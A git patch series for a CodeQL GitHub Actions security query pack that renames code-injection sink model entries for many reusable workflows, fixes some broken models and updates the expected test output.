b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.framework", "code-injection", "generated"] - - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "inputs.configuration", "code-injection", "generated"] \ No newline at end of file + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] + - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index e1a0c8a9fcf3..d47aea3363f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "inputs.pytest_markers", "code-injection", "generated"] \ No newline at end of file + - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 71cd3fed3ed4..f32acf5038ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 47f53f495f83..c739b5750ccb 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 1b592aa91cc4..7ac3c0fb530e 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] - - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index db4e957a87a3..c641035f9662 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index c3642c84f631..adea8ae4bd2c 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 3e6691f0e8f7..857c946e2b78 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 733c2e20a719..717022ea6e83 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index cb80f74e4e89..7dadb99209db 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index 0f78ea086a6c..ca3cb0091e90 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.packages", "code-injection", "generated"] \ No newline at end of file + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index e2bf8f96fa95..6faf8b900578 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 4a8500a147eb..39b6773a2b19 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "input.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 3e362cebc584..cbbce950b419 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 9e5f6e3541e2..48206551bcd0 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "input.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 89fbb5dbf700..256ad3f0e042 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index f7ee9b66305b..ae408b131e08 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel From d18c575cd4848c5b68d95f97ab3f8943a7a0ca1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:22:45 +0200 Subject: [PATCH 178/707] fix broken models --- .../apache_incubator-kie-tools.model.yml | 4 +-- .../streetsidesoftware_cspell.model.yml | 4 +-- ql/test/library-tests/test.expected | 35 +++++++++++++++++++ 3 files changed, 39 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 37f3efbededb..2e28ad9e900c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: summaryModel data: - - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] \ No newline at end of file + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 1f087287d257..70b2c362464e 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -5,7 +5,7 @@ extensions: data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel + pack: githubsecuritylab/actions-all + extensible: summaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c08d4c824e1a..8dfd57567d53 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -399,6 +399,7 @@ sources | dorny/paths-filter | * | output.changes | PR changed files | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | | jitterbit/get-changed-files | * | output.added | PR changed files | manual | | jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | | jitterbit/get-changed-files | * | output.all | PR changed files | manual | @@ -408,6 +409,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | | marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | | tj-actions/branch-names | * | output.current_branch | PR current branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | @@ -439,6 +441,7 @@ sources summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | @@ -452,14 +455,22 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | frabert/replace-string-action | * | input.string | output.replaced | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | @@ -469,14 +480,29 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | | haya14busa/action-cond | * | input.if_false | output.value | taint | manual | | haya14busa/action-cond | * | input.if_true | output.value | taint | manual | | hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | @@ -484,13 +510,22 @@ summaries | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | From bd9cd3eb8680757845031da5e5837277a03a616b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:15:59 +0200 Subject: [PATCH 179/707] new untrusted checkout step --- ql/lib/ext/sergeysova_jq-action.model.yml | 7 +++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 21 ++++++++++++++++++- 